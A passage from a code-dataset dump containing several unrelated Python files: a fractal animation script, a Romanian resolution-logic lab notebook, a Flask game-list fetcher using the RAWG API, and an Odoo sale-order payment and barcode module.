-2.5\nrealMax = 1.5\nimaginaryMin = -2\nimaginaryMax = 2\nrealPoints = 1000\nimaginaryPoints = 1000\nmax_iterations = 200\nmaxInfinityNumber = 10\n\n# Animation settings\ncolor1 = '#309fcf'\ncolor2 = '#cf30bc'\n\ncolorpoints = [(1 - (1 - q) ** 4, c) for q, c in zip(np.linspace(0, 1, 20),\n cycle([color1, '#000000',\n color2, ]))]\ncmap = clr.LinearSegmentedColormap.from_list('mycmap',\n colorpoints, N=2048)\n\n\nfigure = plt.figure(figsize=(10, 10))\nmaxFrames = 30\nmaxZoom = 300\nimages = []\n\ntkinter_window()","sub_path":"graphic.py","file_name":"graphic.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"425710134","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Logica cu predicate (2). 
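The `fractal()` function in the graphic.py record above implements the vectorized escape-time algorithm, but note that its first line allocates the image with the module-level globals `realPoints`/`imaginaryPoints` rather than the `real_points`/`imaginary_points` parameters, so calls with a different resolution would break. A self-contained sketch of the core iteration (function and variable names are mine):

```python
import numpy as np

def escape_time(re_min, re_max, im_min, im_max, nx, ny,
                max_iter=200, bailout=2.0):
    # A complex step in np.mgrid means "this many points, endpoints inclusive".
    re, im = np.mgrid[re_min:re_max:nx * 1j, im_min:im_max:ny * 1j]
    c = re + 1j * im
    z = np.zeros_like(c)
    counts = np.zeros(c.shape)
    with np.errstate(invalid="ignore", over="ignore"):
        # Start at 1 so that 0 can unambiguously mean "never escaped".
        for i in range(1, max_iter + 1):
            z = z * z + c
            escaped = (np.abs(z) > bailout) & (counts == 0)
            counts[escaped] = i
            z[escaped] = np.nan   # freeze escaped points, as the record does
    return -counts.T              # negated, matching the record's color mapping

img = escape_time(-2.5, 1.5, -2.0, 2.0, 300, 300)
```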
Rezoluție\n# - Andrei Olaru\n# - Tudor Berariu\n# \n\n# ## Scopul laboratorului\n# \n# Familiarizarea cu mecanismul rezoluției și cu strategiile de rezoluție.\n# \n# #### Resurse\n# \n# Cursul 5 de IA slides 34-44.\n\n# ### Cerința 1\n# \n# * din notebook-ul de la Laboratorul 5 faceți Download as → Python și salvați fișierul ca `Lab05.py`, în acest director.\n# * adăugați de asemenea în acest director fișierul `Lab05tester.py` (**descărcați din nou** de pe site).\n\n# In[1]:\n\n\n# TODO\nfrom Lab05tester import *\nfrom Lab05 import *\n\n\n# In[2]:\n\n\nfrom copy import deepcopy\nfrom functools import reduce\n\n# în această celulă se găsesc câteva funcții utilizate intern\n\ndummy = make_atom(\"P\")\n[and_name, or_name, neg_name] = [get_head(s) for s in [make_and(dummy, dummy), make_or(dummy, dummy), make_neg(dummy)]]\ndef pFail(message, f):\n print(message + \" <\" + str(f) + \">\")\n return False\ndef check_term(T):\n if is_constant(T):\n return (get_value(T) is not None) or pFail(\"The value of the constant is None\", T)\n if is_variable(T):\n return (get_name(T) is not None) or pFail(\"The name of the variable is None\", T)\n if is_function_call(T):\n return not [t for t in get_args(T) if not check_term(t)] and (get_head(T) is not None or pFail(\"Function is not callable\", T))\n return pFail(\"Term is not one of constant, variable or function call\", T)\ndef check_atom(A):\n if is_atom(A):\n return not [t for t in get_args(A) if not check_term(t)] and (get_head(A) is not None or pFail(\"Predicate name is None\", A))\n return pFail(\"Is not an atom\", A)\ndef check_sentence(S):\n if is_atom(S):\n return check_atom(S)\n if is_sentence(S):\n if get_head(S) in [and_name, or_name]:\n return (len(get_args(S)) >= 2 or pFail(\"Sentence has too few operands\", S)) and not [s for s in get_args(S) if not check_sentence(s)]\n if get_head(S) == neg_name:\n return (len(get_args(S)) == 1 or pFail(\"Negative sentence has not just 1 operand\", S)) and check_sentence(get_args(S)[0])\n return pFail(\"Not sentence or unknown type\", S)\n\ndef add_statement(kb, conclusion, *hypotheses):\n s = conclusion if not hypotheses else make_or(*([make_neg(s) for s in hypotheses] + [conclusion]))\n if check_sentence(s):\n kb.append(s)\n print(\"OK: Added statement \" + print_formula(s, True))\n return True\n print(\"-- FAILED CHECK: Sentence does not check out <\"+print_formula(s, True)+\"><\" + str(s) + \">\")\n return False\n\nvar_no = 0;\n\ndef assign_next_var_name():\n global var_no\n var_no += 1\n return \"v\" + str(var_no)\n\ndef gather_vars(S):\n return [get_name(S)] if is_variable(S) else [] if not has_args(S) else reduce(lambda res, a: res + gather_vars(a), get_args(S), [])\n\ndef make_unique_var_names(KB):\n global var_no\n var_no = 0\n return [substitute(S, {var: make_var(assign_next_var_name()) for var in gather_vars(S)}) for S in KB] \n \ndef print_KB(KB):\n print(\"KB now:\")\n for s in KB:\n print(\"\\t\\t\\t\" + print_formula(s, True))\n\n\n# In[3]:\n\n\n# KB 1\n# based on an example in Artificial Intelligence - A Modern Approach\nKB_America = []\n#0 Mr West is a US general\nadd_statement(KB_America, make_atom(\"USGeneral\", make_const(\"West\")))\n#1 General Awesome is also a US general\nadd_statement(KB_America, make_atom(\"USGeneral\", make_const(\"General_Awesome\")))\n#2 General Awesome is Awesome\nadd_statement(KB_America, make_atom(\"Awesome\", make_const(\"General_Awesome\")))\n#3 Nono is an enemy of America\nadd_statement(KB_America, make_atom(\"Enemy\", make_const(\"Nono\"), 
make_const(\"America\")))\n#4 M1 is a type of missile\nadd_statement(KB_America, make_atom(\"Missile\", make_const(\"M1\")))\n#5 Nono has the M1 missile\nadd_statement(KB_America, make_atom(\"Owns\", make_const(\"Nono\"), make_const(\"M1\")))\n\n#6 any US general is an American\nadd_statement(KB_America, make_atom(\"American\", make_var(\"x\")), make_atom(\"USGeneral\", make_var(\"x\")))\n#7 any missle is a weapon\nadd_statement(KB_America, make_atom(\"Weapon\", make_var(\"x\")), make_atom(\"Missile\", make_var(\"x\")))\n#8 if anyone owns a missile, it is General West that sold them that missile\nadd_statement(KB_America, make_atom(\"Sells\", make_const(\"West\"), make_var(\"y\"), make_var(\"x\")), make_atom(\"Owns\", make_var(\"x\"), make_var(\"y\")), make_atom(\"Missile\", make_var(\"y\")))\n#9 any American who sells weapons to a hostile is a criminal\nadd_statement(KB_America, make_atom(\"Criminal\", make_var(\"x\")), make_atom(\"Weapon\", make_var(\"y\")), make_atom(\"Sells\", make_var(\"x\"), make_var(\"y\"), make_var(\"z\")), make_atom(\"Hostile\", make_var(\"z\")), make_atom(\"American\", make_var(\"x\")))\n#10 any enemy of America is called a hostile\nadd_statement(KB_America, make_atom(\"Hostile\", make_var(\"x\")), make_atom(\"Enemy\", make_var(\"x\"), make_const(\"America\")))\n#11 America is awesome if at least an American is awesome\nadd_statement(KB_America, make_atom(\"Awesome\", make_const(\"America\")), make_atom(\"American\", make_var(\"x\")), make_atom(\"Awesome\", make_var(\"x\")))\n\nKB_America = make_unique_var_names(KB_America)\n\nprint_KB(KB_America)\n\n\n# In[4]:\n\n\n# KB 2\n# din cursul de IA\nKB_Faster = []\n\ndef the_greyhound():\n return make_const(\"Greg\")\n\n#0 horses are faster than dogs\nadd_statement(KB_Faster, make_atom(\"Faster\", make_var(\"x\"), make_var(\"y\")), make_atom(\"Horse\", make_var(\"x\")), make_atom(\"Dog\", make_var(\"y\")))\n#1 there is a greyhound that is faster than any rabbit\nadd_statement(KB_Faster, make_atom(\"Faster\", make_function_call(the_greyhound), make_var(\"z\")), make_atom(\"Rabbit\", make_var(\"z\")))\n#2 Harry is a horse\nadd_statement(KB_Faster, make_atom(\"Horse\", make_const(\"Harry\")))\n#3 Ralph is a rabbit\nadd_statement(KB_Faster, make_atom(\"Rabbit\", make_const(\"Ralph\")))\n#4 Greg is a greyhound\nadd_statement(KB_Faster, make_atom(\"Greyhound\", make_function_call(the_greyhound)))\n#5 A greyhound is a dog\nadd_statement(KB_Faster, make_atom(\"Dog\", make_var(\"y\")), make_atom(\"Greyhound\", make_var(\"y\")))\n#6 transitivity\nadd_statement(KB_Faster, make_atom(\"Faster\", make_var(\"x\"), make_var(\"z\")),\n make_atom(\"Faster\", make_var(\"x\"), make_var(\"y\")), make_atom(\"Faster\", make_var(\"y\"), make_var(\"z\")))\n\nKB_Faster = make_unique_var_names(KB_Faster)\n\nprint_KB(KB_Faster)\n\n\n# In[5]:\n\n\nKB_test = []\nadd_statement(KB_test, make_atom(\"Q\", make_var(\"x\")), make_atom(\"P\", make_var(\"x\")))\nadd_statement(KB_test, make_atom(\"P\", make_const(\"A\")))\n\nKB_test = make_unique_var_names(KB_test)\nprint_KB(KB_test)\n\n\n# ### Cerința 2\n# \n# * Implementați funcția `resolves`, care primește două clauze (literali sau disjuncții de literali) și întoarce `False` dacă cele două clauze nu rezolvă, altfel un tuplu care conține literalii care rezolvă, din cele două clauze, și substituția sub care aceștia rezolvă.\n\n# In[6]:\n\n\ndef is_positive_literal(L):\n return is_atom(L)\ndef is_negative_literal(L):\n global neg_name\n return get_head(L) == neg_name and 
is_positive_literal(get_args(L)[0])\ndef is_literal(L):\n return is_positive_literal(L) or is_negative_literal(L)\n\ndef resolves(C1, C2):\n #print(\"testing \" + print_formula(C1, True) + \" and \" + print_formula(C2, True))\n \n # întoarce un tuplu (literal-din-C1, literal-din-C2, substituție)\n # unde literal-din-C1 și literal-din-C2 unifică sub substituție\n literalsC1 = []\n if is_literal(C1):\n literalsC1.append(C1)\n else:\n literalsC1 = get_args(C1)\n \n literalsC2 = []\n if is_literal(C2):\n literalsC2.append(C2)\n else:\n literalsC2 = get_args(C2)\n \n result = ()\n for c1 in literalsC1:\n found = False\n subst = {}\n for c2 in literalsC2:\n if is_positive_literal(c1) and is_negative_literal(c2):\n subst = unify(c1, get_args(c2)[0])\n if subst != False:\n result = (c1, c2, subst)\n found = True\n break\n if is_negative_literal(c1) and is_positive_literal(c2):\n subst = unify(get_args(c1)[0], c2)\n if subst != False:\n result = (c1, c2, subst)\n found = True\n break\n\n # întoarce un tuplu (literal-din-C1, literal-din-C2, substituție)\n # unde literal-din-C1 și literal-din-C2 unifică sub substituție\n if found:\n return result\n return False\n\n# Test!\ntest_batch(4, globals())\n\n\n# In[7]:\n\n\n# prints a 5-tuple resolvent representation (see below)\ndef print_r(R):\n if R is None:\n print(\"no resolvent\")\n else:\n print(\"resolvent: \" + print_formula(R[2], True) + \"/\" + print_formula(R[3], True) + str(R[4]) + \"\\n\\t\\t in \" + print_formula(R[0], True) + \"\\n\\t\\t and \" + print_formula(R[1], True))\n\n\n# ### Cerința 3\n# \n# * implementați partea lipsă din funcția `solve_problem`, utilizând o strategie de rezoluție la alegere pentru a alege două clauze care rezolvă, și adăugând rezultatul pasului de rezoluție la baza de cunoștințe.\n\n# In[8]:\n\n\ndef solve_problem(hypotheses, conclusion):\n KB = hypotheses[:]\n KB = [make_neg(conclusion)] + KB # puteți adăuga și la sfârșit (în funcție de strategie)\n Effort = 50\n \n checked = []\n \n while Effort > 0:\n \n # Se calculează un rezolvent, ca tuplu (Clauza1, Clauza2, Literal-din-clauza1, Literal-din-clauza2, substituție)\n resolvent = None # TODO\n \n found = False\n for i in range(len(KB)):\n c1 = KB[i]\n \n if found == True:\n break\n \n for j in range(i+1, len(KB)):\n c2 = KB[j]\n \n if (c1, c2) not in checked:\n res = resolves(c1, c2)\n if (res != False):\n found = True\n \n resolvent = (c1, c2, res[0], res[1], res[2])\n checked.append((c1, c2))\n \n break\n\n print_r(resolvent)\n if resolvent is None:\n print(\"Failed. No resolving clauses. 
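`resolves()` above pairs a positive literal from one clause with a negative literal from the other and unifies them via the Lab05 `unify`. Stripped of first-order unification, a single resolution step over ground clauses reduces to set operations; a minimal standalone sketch (the string-literal representation is mine):

```python
# One propositional resolution step: clauses are frozensets of string
# literals, "P" positive and "-P" negative, mirroring resolves() above.

def negate(lit):
    return lit[1:] if lit.startswith("-") else "-" + lit

def resolve(c1, c2):
    """Return the resolvent if c1 and c2 clash on some literal, else None."""
    for lit in c1:
        if negate(lit) in c2:
            return (c1 - {lit}) | (c2 - {negate(lit)})
    return None

# Refutation of Q from {P -> Q, P}: add the negated goal and resolve.
kb = [frozenset({"-P", "Q"}), frozenset({"P"}), frozenset({"-Q"})]
step1 = resolve(kb[0], kb[1])   # frozenset({'Q'})
print(resolve(step1, kb[2]))    # frozenset() -> empty clause: contradiction
```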
Effort left \" + str(Effort))\n return False\n \n # Se calculează noua clauză de adăugat și se adaugă la baza de cunoștințe\n # Clauza trebuie să fie în acest punct o listă de literali\n C = None # TODO\n \n C1_subst = substitute(resolvent[0], resolvent[4])\n C2_subst = substitute(resolvent[1], resolvent[4])\n\n literalsC1 = []\n if is_literal(C1_subst):\n literalsC1.append(C1_subst)\n else:\n literalsC1 = get_args(C1_subst)\n\n literalsC2 = []\n if is_literal(C2_subst):\n literalsC2.append(C2_subst)\n else:\n literalsC2 = get_args(C2_subst)\n\n # elimina literalii care au rezolvat sub subst\n literalsC1.remove(substitute(resolvent[2], resolvent[4]))\n literalsC2.remove(substitute(resolvent[3], resolvent[4]))\n \n C = literalsC1 + literalsC2\n \n # update KB\n if C == []:\n print(\"Done (effort left \" + str(Effort) + \")\")\n return True\n if len(C) == 1:\n C = C[0]\n else:\n C = make_or(*C)\n print(\"Added: \" + print_formula(C, True))\n KB = [C] + KB\n Effort -= 1\n\n print_KB(KB)\n print(\"Failed. Effort exhausted.\")\n \n \n#print_KB(KB_test)\n#solve_problem(deepcopy(KB_test), make_atom(\"Q\", make_const(\"A\")))\n\n#print_KB(KB_America)\n#solve_problem(deepcopy(KB_America), make_atom(\"Criminal\", make_const(\"West\")))\n\n#print_KB(KB_Faster)\nsolve_problem(deepcopy(KB_Faster), make_atom(\"Faster\", make_const(\"Harry\"), make_const(\"Ralph\")))\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"IA/lab7/Lab06Skel.py","file_name":"Lab06Skel.py","file_ext":"py","file_size_in_byte":12030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"507435013","text":"from concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor, wait, as_completed, ALL_COMPLETED\nfrom flask import render_template\nfrom collections import namedtuple\nimport threading\nimport requests\nimport json\n\n\ndef getAllGames():\n globalGamesArr = []\n pool = ThreadPoolExecutor(10)\n futures = []\n for x in range(1, 20):\n futures.append(pool.submit(requestWorker, (x)))\n\n wait(futures, timeout=None, return_when=ALL_COMPLETED)\n for future in as_completed(futures):\n result = future.result()\n globalGamesArr.append(result)\n\n def flatten(l): return [item for sublist in l for item in sublist]\n globalGamesArr = flatten(globalGamesArr)\n globalGamesArr.sort(key=lambda x: x.rating, reverse=True)\n return render_template('games.html', title='Home', gamesArr=globalGamesArr)\n\n\ndef requestWorker(pageIndex):\n url = \"https://api.rawg.io/api/games?page_size=500&page=\" + str(pageIndex)\n localGamesArr = []\n response = requests.request(\"GET\", url)\n games = json.loads(response.text)['results']\n for oneGame in games:\n localGamesArr.append(namedtuple(\n \"Game\", oneGame.keys())(*oneGame.values()))\n print(pageIndex)\n return localGamesArr\n","sub_path":"games.py","file_name":"games.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"238959478","text":"# -*- coding: utf-8 -*-\r\n##############################################################################\r\n#\r\n# Copyright 2021 German Ponce Dominguez\r\n#\r\n##############################################################################\r\n\r\nfrom odoo import models, api, fields, _\r\nfrom odoo.exceptions import ValidationError, UserError\r\n\r\nfrom odoo.tools import 
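The games.py record just above fans out one HTTP request per page and flattens the results; note that it both `wait()`s on all futures and then iterates `as_completed`, which is redundant, since `as_completed` already blocks until each future finishes. A trimmed sketch of the same pattern (the URL and JSON shape come from the record; the function names and `timeout` are mine):

```python
from concurrent.futures import ThreadPoolExecutor, as_completed
import requests

def fetch_page(page):
    url = "https://api.rawg.io/api/games?page_size=500&page=%d" % page
    return requests.get(url, timeout=10).json()["results"]

def fetch_all(pages=range(1, 20), workers=10):
    results = []
    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = [pool.submit(fetch_page, p) for p in pages]
        for future in as_completed(futures):  # blocks per-future; wait() not needed
            results.extend(future.result())   # flatten as results arrive
    return results
```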
float_is_zero, float_compare\r\nfrom itertools import groupby\r\n\r\n\r\nclass StockPicking(models.Model):\r\n _inherit = 'stock.picking'\r\n\r\n def button_validate(self):\r\n if self.sale_id:\r\n if self.sale_id.total_payment == False:\r\n if self.sale_id.payment_exception == False:\r\n raise UserError(_(\"Solo puede entregarse la Mercancia si el Pedido esta Pagado.\"))\r\n res = super(StockPicking, self).button_validate()\r\n return res\r\n\r\n\r\nclass SaleAdvancePaymentInv(models.TransientModel):\r\n _inherit = \"sale.advance.payment.inv\"\r\n\r\n def _prepare_invoice_values(self, order, name, amount, so_line):\r\n res = super(SaleAdvancePaymentInv, self)._prepare_invoice_values(order, name, amount, so_line)\r\n if 'invoice_line_ids' in res:\r\n invoice_lines = res['invoice_line_ids']\r\n invoice_lines_updated = []\r\n for invline in invoice_lines:\r\n line_vals = invline[2]\r\n line_vals.update({'order_to_global_id': order.id})\r\n invoice_lines_updated.append((0,0,line_vals))\r\n return res\r\n\r\n\r\nclass ResCompany(models.Model):\r\n _name = 'res.company'\r\n _inherit ='res.company'\r\n\r\n account_sale_payments = fields.Many2one('account.account', 'Cuenta Puente Registro de Pagos')\r\n\r\nclass AccountInvoiceLine(models.Model):\r\n _name = 'account.move.line'\r\n _inherit ='account.move.line'\r\n\r\n order_to_global_id = fields.Many2one('sale.order','Pedido Origen', copy=False)\r\n re_invoiced = fields.Boolean('Refacturación', copy=False)\r\n\r\n\r\n\r\nclass SaleOrderLine(models.Model):\r\n _name = 'sale.order.line'\r\n _inherit ='sale.order.line'\r\n\r\n\r\n @api.depends('invoice_lines.move_id.state', 'invoice_lines.quantity', 'untaxed_amount_to_invoice')\r\n def _get_invoice_qty(self):\r\n \"\"\"\r\n Compute the quantity invoiced. If case of a refund, the quantity invoiced is decreased. Note\r\n that this is the case only if the refund is generated from the SO and that is intentional: if\r\n a refund made would automatically decrease the invoiced quantity, then there is a risk of reinvoicing\r\n it automatically, which may not be wanted at all. 
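`_prepare_invoice_values` above rewrites each invoice line as a `(0, 0, vals)` triple. These are Odoo's x2many write commands, which this module uses in several places; a quick reference sketch with illustrative values:

```python
# Odoo x2many write commands seen throughout this file:
#   (0, 0, vals)  -> create a new record from vals and link it
#   (4, id)       -> link an existing record by id
#   (6, 0, ids)   -> replace the whole relation with exactly these ids
line_commands = [(0, 0, {"name": "demo line", "quantity": 1.0})]
link_payment = [(4, 42)]          # as in adv_payment_ids below
replace_taxes = [(6, 0, [1, 3])]  # as in tax_id in on_change_load_products
```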
That's why the refund has to be created from the SO\r\n \"\"\"\r\n for line in self:\r\n qty_invoiced = 0.0\r\n for invoice_line in line.invoice_lines:\r\n if invoice_line.move_id.state != 'cancel':\r\n if invoice_line.move_id.move_type == 'out_invoice':\r\n if not invoice_line.re_invoiced:\r\n qty_invoiced += invoice_line.product_uom_id._compute_quantity(invoice_line.quantity, line.product_uom)\r\n elif invoice_line.move_id.move_type == 'out_refund':\r\n if not line.is_downpayment or line.untaxed_amount_to_invoice == 0 :\r\n if not invoice_line.re_invoiced:\r\n qty_invoiced -= invoice_line.product_uom_id._compute_quantity(invoice_line.quantity, line.product_uom)\r\n line.qty_invoiced = qty_invoiced\r\n\r\n\r\n # @api.model\r\n # def create(self, vals):\r\n # if 'company_id' in vals:\r\n # self = self.with_company(vals['company_id'])\r\n # if 'name' not in vals or 'product_id' not in vals:\r\n # return True\r\n # if vals.get('name',False) == False and vals.get('product_id',False) == False:\r\n # return True\r\n # result = super(SaleOrderLine, self).create(vals)\r\n # return result\r\n\r\nclass sale_order(models.Model):\r\n _inherit = 'sale.order'\r\n\r\n @api.depends('state', 'amount_payment', 'total_payment')\r\n def _get_payments(self):\r\n\r\n for order in self:\r\n payment_count = 0\r\n if order.payments_apply_ids:\r\n for pay in order.payments_apply_ids:\r\n payment_count += 1\r\n order.update({\r\n 'payment_count': payment_count,\r\n })\r\n\r\n @api.depends('state', 'amount_payment', 'total_payment')\r\n def _get_pending_amount(self):\r\n\r\n for order in self:\r\n order_total = order.amount_total\r\n amount_pending = order_total - order.amount_payment\r\n if amount_pending < 0.0:\r\n amount_pending = 0.0\r\n order.update({\r\n 'amount_pending': amount_pending,\r\n 'amount_total_order': order_total,\r\n })\r\n\r\n\r\n amount_payment = fields.Float('Importe Pagado', copy=False)\r\n total_payment = fields.Boolean('Pagado', copy=False)\r\n \r\n payment_exception = fields.Boolean('Excepcion Pago', copy=False)\r\n\r\n amount_pending = fields.Float('Importe Pendiente ', compute='_get_pending_amount', store=True, digits=(14,4))\r\n\r\n amount_total_order = fields.Float('Importe Total ', compute='_get_pending_amount', store=True, digits=(14,4))\r\n \r\n\r\n payment_count = fields.Integer(string='# of Pagos', compute='_get_payments', readonly=True)\r\n\r\n # product_on_id = fields.Many2one('product.product','Producto', required=False,)\r\n # product_qty = fields.Integer('Cantidad', default=1)\r\n\r\n product_on_read = fields.Char('Lectura Codigo Barras', required=False, help=\"\"\"Ingresa el Codigo del Producto Automaticamente se Agregara como linea tomando El precio del producto y su unidad de Medida\r\n Podemos Agregar los Siguientes Comodines:\r\n - Si queremos agregar el Producto y la Cantidad a la Vez ponemos el Codigo del Producto + Cantidad, es importante poner el simbolo + despues del Producto'\"\"\" )\r\n\r\n easy_refund = fields.Float('Cambio', copy=False)\r\n\r\n re_invoiced = fields.Boolean('Refacturado', copy=False)\r\n\r\n user_payment_register_id = fields.Many2one('res.users','Cajero')\r\n\r\n invoice_global_ids = fields.Many2many('account.move',\r\n 'account_invoice_sale_rel', 'sale_id', 'invoice_id',\r\n string='Facturas', copy=False)\r\n\r\n ### Modulo Original ##\r\n payments_apply_ids = fields.One2many('account.payment', 'sale_order_id', 'Pagos aplicados')\r\n adv_payment_ids = fields.Many2many('account.payment', string=\"Pagos Relacionados\", copy=False)\r\n\r\n def 
_create_invoices(self, grouped=False, final=False, date=None):\r\n res = super(sale_order, self)._create_invoices(grouped=grouped, final=final, date=date)\r\n if res:\r\n for inv in res:\r\n for line in inv.invoice_line_ids:\r\n line.order_to_global_id = self.id\r\n return res\r\n\r\n def action_view_adv_payments(self):\r\n action = self.env.ref('account.action_account_payments').read()[0]\r\n action['domain'] = [('id', 'in', self.adv_payment_ids.ids)] if self.adv_payment_ids.ids else []\r\n action['context'] = {'create': 0}\r\n return action\r\n\r\n def btn_advance_payment(self):\r\n cus_ctx = {}\r\n if self.total_payment:\r\n raise UserError(_(\"El Pedido ya se encuentra en estado Pagado\"))\r\n if self.state not in ('sale','done'):\r\n raise UserError(_(\"Solo se pueden realizar pagos en los estados:\\n* Pedido Venta\\n* Hecho\"))\r\n amount_residual = self.amount_total-self.amount_payment\r\n cus_ctx.update({'default_amount': amount_residual})\r\n\r\n\r\n cus_ctx.update({'default_payment_type': 'inbound',\r\n 'default_partner_type': 'customer',\r\n 'search_default_inbound_filter': 1,\r\n 'res_partner_search_mode': 'customer',\r\n 'default_partner_id': self.partner_id.id,\r\n 'default_communication': self.name,\r\n 'default_sale_order_id': self.id,\r\n 'default_ref': self.name,\r\n 'active_ids':[],\r\n 'active_model':self._name,\r\n 'active_id':self.id,\r\n 'default_currency_id': self.currency_id.id})\r\n ctx = self._context.copy()\r\n ctx.update(cus_ctx)\r\n return {\r\n 'name': _('Pago Avanzado'),\r\n 'res_model': 'account.payment',\r\n 'view_mode': 'form',\r\n 'view_id': self.env.ref('fx_sale_advance_payment.view_sale_advance_account_payment_form').id,\r\n 'target': 'new',\r\n 'type': 'ir.actions.act_window',\r\n 'context': ctx\r\n }\r\n\r\n\r\n def action_cancel(self):\r\n for rec in self:\r\n payment_ids = self.env['account.payment'].sudo().search([('sale_order_id','=',rec.id)])\r\n if payment_ids:\r\n for payment in payment_ids:\r\n if payment.state not in ( 'draft','cancel' ):\r\n raise UserError(_(\"No puedes cancelar el Pedido, primero debes cancelar los Pagos Relacionados.\"))\r\n res = super(sale_order, self).action_cancel()\r\n for rec in self:\r\n rec.write({'total_payment':False,'amount_payment': 0.0})\r\n return res\r\n\r\n @api.onchange('partner_id', 'product_on_read', 'order_line','pricelist_id')\r\n def on_change_load_products(self):\r\n product_obj = self.env['product.product']\r\n salesman_obj = self.env['res.users']\r\n partner_obj = self.env['res.partner']\r\n partner = partner_obj.browse(self.partner_id)\r\n lines = [x.id for x in self.order_line]\r\n if not self.product_on_read:\r\n return {}\r\n\r\n qty_product = 1\r\n\r\n if self.product_on_read:\r\n if '+' in self.product_on_read:\r\n try:\r\n product_on_read = self.product_on_read.split(\"+\")\r\n qty_product_str = product_on_read[1]\r\n qty_product = float(qty_product_str)\r\n\r\n except:\r\n raise UserError(_(\"Error!\\nLa Informacion Introducida Contiene Errores. 
Verifique que el orden de la informacion sea como los siguientes ejemplos:\\\r\n \\n -[Cantidad+CodigoProducto]\"))\r\n\r\n product_on_read = self.product_on_read.split(\"+\")\r\n default_code = product_on_read[0]\r\n if len(default_code) > 12:\r\n default_code = default_code[0:12]\r\n # product_search = product_obj.search([('default_code','=',default_code)])\r\n self.env.cr.execute(\"\"\"\r\n select id from product_product where UPPER(default_code) = %s;\r\n \"\"\", (default_code.upper(),))\r\n cr_res = self.env.cr.fetchall()\r\n product_search = [x[0] for x in cr_res]\r\n if not product_search:\r\n self.env.cr.execute(\"\"\"\r\n select id from product_product where UPPER(barcode) like %s;\r\n \"\"\", ('%'+default_code.upper()+'%',))\r\n cr_res = self.env.cr.fetchall()\r\n product_search = [x[0] for x in cr_res]\r\n if not product_search:\r\n raise UserError(_(\"Error!\\nEl codigo [%s] no coincide con ninguna referencia de Producto.\" % default_code))\r\n\r\n product_id = product_search[0]\r\n product_br = product_obj.browse(product_search[0])\r\n if product_br.default_code:\r\n product_name = '['+product_br.default_code +']'+product_br.name\r\n else:\r\n product_name = product_br.name\r\n if product_br.property_account_income_id:\r\n account_id = product_br.property_account_income_id.id\r\n else:\r\n account_id = product_br.categ_id.property_account_income_categ_id.id\r\n # price = product_br.lst_price\r\n sale_order_line = self.env['sale.order.line']\r\n\r\n product_br_with_ctx = product_br.with_context(pricelist=self.pricelist_id.id)\r\n if self.pricelist_id and self.partner_id:\r\n # price = self.env['account.tax']._fix_tax_included_price(sale_order_line._get_display_price(product_br), product_br.taxes_id, [_w for _w in product_br.taxes_id] )\r\n price = product_br_with_ctx.price\r\n else:\r\n price = product_br.lst_price\r\n taxes_list = [_w.id for _w in product_br.taxes_id]\r\n\r\n if product_id:\r\n xline = (0,0,{\r\n 'product_id': product_id,\r\n 'name': product_name,\r\n 'tax_id': [(6, 0, taxes_list )],\r\n 'product_uom_qty': int(qty_product),\r\n 'price_unit': price,\r\n 'product_uom': product_br.uom_id.id,\r\n # 'account_id': account_id,\r\n })\r\n lines.append(xline)\r\n self.simple_add_product(product_id, int(qty_product))\r\n # print (\"######### lines >>>>>>>>>>>>>> \", lines)\r\n # self.update({'order_line': lines})\r\n \r\n self.product_on_read = False\r\n #self.recalculate_prices()\r\n\r\n def simple_add_product(self, product_id, qty=1.0):\r\n corresponding_line = self.order_line.filtered(\r\n lambda x: x.product_id.id == product_id)\r\n if corresponding_line:\r\n for cpline in corresponding_line:\r\n corresponding_line.product_uom_qty += qty\r\n break\r\n else:\r\n line = self.order_line.new({\r\n 'product_id': product_id,\r\n 'product_uom_qty': qty,\r\n 'order_id': self.id,\r\n })\r\n line.product_id_change()\r\n return True\r\n\r\n def on_barcode_scanned(self, barcode):\r\n product = self.env[\r\n 'product.product'].search([('barcode', '=', barcode)], limit=1)\r\n if product:\r\n self._add_product(product)\r\n else:\r\n product = self.env[\r\n 'product.product'].search([('default_code', '=', barcode)], limi=1)\r\n if product:\r\n self._add_product(product)\r\n else:\r\n return {'warning': {\r\n 'title': _('Error'),\r\n 'message': _(\r\n 'El codigo de barras o referencia \"%(barcode)s\" no'\r\n ' corresponde con ningun registro en la Base de Datos.') % {'barcode': barcode}\r\n }}\r\n\r\n def _add_product(self, product, qty=1.0):\r\n corresponding_line = 
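In `on_barcode_scanned` below, the `default_code` fallback passes `limi=1`, which would raise a `TypeError` at runtime; `limit=1` is almost certainly intended. A corrected sketch of that lookup, written as a method of the same model rather than standalone code:

```python
def on_barcode_scanned(self, barcode):
    # Sketch with the `limi=1` typo fixed; behavior otherwise as in the record.
    Product = self.env['product.product']
    product = Product.search([('barcode', '=', barcode)], limit=1)
    if not product:
        product = Product.search([('default_code', '=', barcode)], limit=1)
    if product:
        self._add_product(product)
        return
    return {'warning': {'title': 'Error',
                        'message': 'No record matches barcode %s' % barcode}}
```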
